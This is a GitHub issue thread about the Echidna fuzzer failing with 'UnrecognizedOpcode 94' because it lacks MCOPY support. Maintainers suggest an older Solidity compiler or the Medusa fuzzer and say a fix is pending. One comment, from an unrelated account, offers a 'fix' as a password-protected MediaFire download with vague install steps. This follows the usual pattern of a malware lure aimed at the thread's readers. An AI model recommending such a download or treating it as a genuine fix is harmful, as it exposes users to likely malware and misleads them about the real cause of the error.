### ISSUE TITLE
[Bug-Candidate]: error UnrecognizedOpcode 94

### ISSUE THREAD

**Issue by eilgug** [crytic/echidna#1301]
### Describe the issue:

While trying to deploy an ERC1967Proxy echidna fails with error: `error UnrecognizedOpcode 94`

### Code example to reproduce the issue:

```solidity
import { ERC1967Proxy } from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";

contract Test {
     staker = Staker(address(new ERC1967Proxy(stakerImpl, "")));
}
```

### Version:

Echidna 2.2.4
Slither 0.10.3

### Relevant log output:

```shell
[2024-08-27 19:02:43.70] Compiling ./test/fuzz/CryticTester.sol... Done! (1.445972s)
Analyzing contract: /Users/xxx/workspace/contracts-monorepo/test/fuzz/CryticTester.sol:CryticTester
[2024-08-27 19:02:45.25] Running slither on ./test/fuzz/CryticTester.sol... Done! (2.877276s)
echidna: Deploying the contract 0x00a329c0648769A73afAc7F9381E08FB43dBEA72 failed (revert, out-of-gas, sending ether to an non-payable constructor, etc.):
... events
error UnrecognizedOpcode 94
```

**Comment by 0xalpharush** [comment]
Echidna does not yet support MCOPY (see https://github.com/ethereum/hevm/issues/469). You can either use solc <= 0.8.2e switch to [Medusa](https://github.com/crytic/medusa/) and let us know if there's anything missing you need to get fuzzing.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eilgug** [comment]
Not exactly the answer I was hoping for, but for now it works, thanks!
I will follow the evolution of the theme in the issue you linked.

**Comment by ggrieco-tob** [comment]
It's almost done, it should be solved in the next release, once hevm finish with the implementation.
